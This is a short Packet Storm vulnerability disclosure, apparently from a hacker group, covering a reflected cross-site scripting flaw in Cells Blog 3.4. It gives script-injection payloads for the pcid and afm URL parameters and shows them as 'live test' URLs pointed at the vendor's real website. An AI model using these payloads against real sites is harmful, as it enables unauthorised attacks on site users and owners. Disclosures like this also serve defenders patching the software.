Cells Blog 3.4 Cross Site Scripting

2014-04-28T00:00:00
ID PACKETSTORM:126374
Type packetstorm
Reporter kurdish hackers team
Modified 2014-04-28T00:00:00

Description

                                        
                                            `-----------------------------------------------------------  
foun by :kurd-team , Exploiter  
group : kurdish hackers team  
contact : pshela@yahoo.com  
site : facebook.com/kurdteam  
-----------------------------------------------------------  
------------------------script-----------------------------  
-----------------------------------------------------------  
script :Cells Blog V3.4  
site :http://www.cells.tw  
download : http://www.cells.tw/data/cells-v3-4.zip  
-----------------------------------------------------------  
  
  
Exploit:  
--------  
  
Exmple:  
-------  
/path/user.php?pcid="><script>alert('kurdteam')</script>  
  
  
live teast :  
http://www.cells.tw/user.php?pcid="><script>alert('kurdteam')</script>  
http://www.cells.tw/server.php?domain=www.cells.tw&sysmgremail=allen@apre.tw&sysversion=V3.4&abg=2&afm="><script>alert('kurdteam')</script>&abm=2&apc=5&country=Taiwan&banner=Cells  
-----------------------------------------------------------  
dyari bo hamu hackerani kurd :Zryan_kurd , all Member kurdsystem.com  
-----------------------------------------------------------  
`